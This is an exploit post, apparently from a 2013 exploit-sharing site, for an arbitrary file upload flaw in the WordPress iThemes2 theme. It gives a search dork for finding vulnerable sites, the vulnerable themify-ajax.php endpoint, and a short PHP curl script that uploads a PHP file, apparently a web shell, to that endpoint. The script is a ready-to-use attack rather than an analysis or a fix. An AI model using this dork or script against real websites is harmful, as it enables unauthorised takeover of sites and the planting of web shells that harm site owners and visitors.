WordPress iThemes2 Shell Upload

############################################################
#Title                : Wordpress iThemes2 Themes Arbitrary File Upload
#Author            : DevilScreaM
#Date               : 11/20/2013 - 20 November 2013
#Category        : Web Applications
#Type               : PHP
#Vendor           : http://themify.me/
#Link                 : http://themify.me/themes/ithemes2
#Greetz             : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
                             Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Indonesian Coder
#Thanks           : ShadoWNamE | gruberr0r | Win32Conficker | Xrwrr | Rec0ded |
#Tested            : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity  : Arbitrary File Upload
############################################################


Dork :
inurl:wp-content/themes/ithemes2
Exploit :

http://SITE-TARGET/wp-content/themes/ithemes2/themify/themify-ajax.php
Script :
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult"; ?>

Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity